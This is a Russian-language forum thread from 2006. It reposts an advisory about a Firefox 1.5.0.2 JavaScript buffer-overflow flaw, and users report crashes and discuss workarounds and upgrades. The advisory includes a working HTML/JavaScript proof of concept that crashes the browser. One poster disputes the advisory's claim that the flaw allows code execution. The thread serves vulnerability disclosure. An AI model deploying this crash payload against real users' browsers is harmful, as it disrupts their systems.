25 апреля, 2006
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea"; 
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Решение: Способов устранения уязвимости не существует в настоящее время.

Скопировал. Кликнул по полю ввода. Firefox 1.5.0.2 вывалился.
Временное решение: Запретить выполнение JavaScript с помощью, например, NoScript.

Люди... Извините, сам проверить не могу, но судя по LOR (http://www.linux.org.ru/view-message.jsp?msgid=1367875&page=0) - поддвержены именно 1.5.0.2 версии...

Да, действительно, ФФ вылетает

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

Получишь 21 критическую уязвимость (-;Е

krigstask
Млин, меж двух огней. Выбераю наименьшее  зло.

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

Тебе это так жить мешает?

Почесал
Сейчас вообще по барабану. Мало ли - стукнет.

Если эта уязвимость то же самое, что описано на http://secunia.com/advisories/19802/ (что и есть, судя тому что пути к "эксплоиту" совпадают) - то эта уязвимость не позволяет выполнить   "произвольный код на целевой системе", а является банальным кодом валящим браузер.
Опасность - 1 из 5, ничего интересного.

Кому интересно, могут прочесть http://forums.mozillazine.org/viewtopic.php?t=408603

Unghost
А оно так и есть. Обычное переполнение буфера, ничего нового.

:::: Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.0.2) Gecko/20060405 SeaMonkey/1.0.1 тоже падает

КСТАТЕ вот источник откуда я это скопировал http://www.securitylab.ru/vulnerability/266229.php  ОЧЕНЬ ХОРОШИЙ САЙТ!

Решение: Способов устранения уязвимости не существует в настоящее время.

Существует, поставить v2.0a1, например.

:::: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1 - не падает.

Tearis
поставить v2.0a1, например.

Начиная с 25-го в nightly/latest 1.5.0.2 поехали локализации (включая и mar-файлы), на сегодня уже почти полный набор. Русская, к примеру, проявилась - 25-Apr-2006 19:53. Мне просто некогда качать и проверять (сам на .0.3-й), ежели кого плющит по безопасности - попробуйте.